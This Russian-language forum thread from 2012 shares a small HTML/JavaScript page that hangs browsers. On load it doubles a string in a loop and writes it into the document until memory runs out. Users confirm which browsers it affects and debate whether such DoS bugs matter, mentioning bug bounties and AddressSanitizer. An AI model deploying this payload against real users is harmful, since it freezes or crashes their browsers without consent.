Старый 27.06.2012, 03:32   #1
<cyber-punk>
 
Аватар для <cyber-punk>
 
Регистрация: 06.10.2011
Сообщений: 10
Репутация: 9
По умолчанию DoS в некоторых браузерах.

Начну из далека. Копался в старом ящике, и нашел свой маленький эксплойт (07.11). Решил протестировать - до сих пор работает. Возможно он уже где-то был, или еще что-то не так, но я выложу его здесь. Если нужно будет - снесут тему.

Эксплойт:

Код HTML:
<body onload="javascript:Attack_me();"></body>
 
<script>
 
function Attack_me() {
 
var buffer = '\x42';
for (i =0;i<1337;i++) {
buffer+=buffer+'\x42';
document.write('<html><marquee><h2>'+buffer+buffer);
}
 
}
 
</script>
Работает:

Код:
ie 9 
maxthon 3.3.8.3000 
opera 12, 11.61
chrome 17 (тут точно не скажу, тестировал @p1p3tka), 19.0.1084.52
safari 5.1.7 
firefox 11.0, 12.0
source - pastebin.com
Сам эксплойт в действии ( ОСТОРОЖНО! )
Вариант эксплойта c data: через iframe ( ОСТОРОЖНО! )


Буду рад помощи в тестировании.

Еще раз извиняюсь, если оффтоп.
__________________
Blog - cyberpunkych
Twitter - @cyberpunkych
<cyber-punk> вне форума   Ответить с цитированием
Старый 27.06.2012, 04:11   #2
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

опера 11.61 работает ._.
12309 вне форума   Ответить с цитированием
Старый 27.06.2012, 13:04   #4
_Spamer_
 
Регистрация: 06.07.2010
Сообщений: 20
Репутация: 0
По умолчанию

firefox 13.0.1 - работает
_Spamer_ вне форума   Ответить с цитированием
Старый 27.06.2012, 13:15   #5
Beched
 
Регистрация: 06.07.2010
Сообщений: 400
Репутация: 118
По умолчанию

Да нах тестить на всех подряд браузерах? Надо для начала отладить и понять, есть ли там что-то нужное, а не только дос.
Beched вне форума   Ответить с цитированием
Старый 27.06.2012, 20:02   #6
0ze
 
Регистрация: 24.10.2010
Сообщений: 6
Репутация: 1
По умолчанию

Никогда не понимал смысла "эксплойтов" типа DoS в браузерах. Таких багов можно находить десятками, будь то null-pointer-dereferene, stack overflow или истощение памяти. В последнем случае Chrome сам просто прихлопывает таб. Если хочется определить тип баги, то для Chrome и Firefox есть билды с AddressSanitizer.
0ze вне форума   Ответить с цитированием
Старый 28.06.2012, 03:05   #7
<cyber-punk>
 
Аватар для <cyber-punk>
 
Регистрация: 06.10.2011
Сообщений: 10
Репутация: 9
По умолчанию

Цитата:
Сообщение от 0ze Посмотреть сообщение
Никогда не понимал смысла "эксплойтов" типа DoS в браузерах. Таких багов можно находить десятками, будь то null-pointer-dereferene, stack overflow или истощение памяти. В последнем случае Chrome сам просто прихлопывает таб. Если хочется определить тип баги, то для Chrome и Firefox есть билды с AddressSanitizer.
Все правильно Но я думаю, что если вы найдете переполнение буфера в хроме, то за это можно и денюжки от самого гугла получить. Или я ошибаюсь?
__________________
Blog - cyberpunkych
Twitter - @cyberpunkych
<cyber-punk> вне форума   Ответить с цитированием
Старый 28.06.2012, 08:49   #8
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

Цитата:
можно и денюжки от самого гугла получить. Или я ошибаюсь?
Да ещё и лопата нужна будет)) А подобные denial of service остаются бесполезными (хоть и интересными с некоторой стороны) приколюхами. Браузер же не крешится, просто идёт перерасход памяти. И, если я правильно понимаю, ни до чего большего это не раскручивается. Вот если бы там overflow был... ^_^

0ze, тип баги истощение памяти видно даже по встроенному в хром диспетчеру процессов -) Без плагинов.
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 28.06.2012, 12:17   #9
0ze
 
Регистрация: 24.10.2010
Сообщений: 6
Репутация: 1
По умолчанию

Bug bounty в хроме можно получить за чаще всего встречающиеся use-after-free, heap-buffer-overflow, за некоторые другие проблемы. Написав stack overflow, я не имел ввиду переполнение буфера стека, это разные вещи - http://blogs.technet.com/b/srd/archive/2009/01/28/stack-overflow-stack-exhaustion-not-the-same-as-stack-buffer-overflow.aspx?Redirected=true. А переполнение буфера стека в браузерах сегодня уже не найдёшь.

Понятно, что истощение можно определить и без AddressSanitizer. Я его упомянул просто к слову. Кстати, не совсем верно называть его плагином.
0ze вне форума   Ответить с цитированием
Старый 29.06.2012, 02:50   #10
mr.The
 
Аватар для mr.The
 
Регистрация: 05.07.2010
Сообщений: 73
Репутация: 16
По умолчанию

До сих пор актуальный говнокод на ту же тему: http://mrthe.name/2009/03/opera-forever/
Почти все браузеры просто не могут корректно обработать форк бомбу или её подобие. Никакой особой опасности это не несёт.
__________________
Бложек mr.The. :rolleyes:
mr.The вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot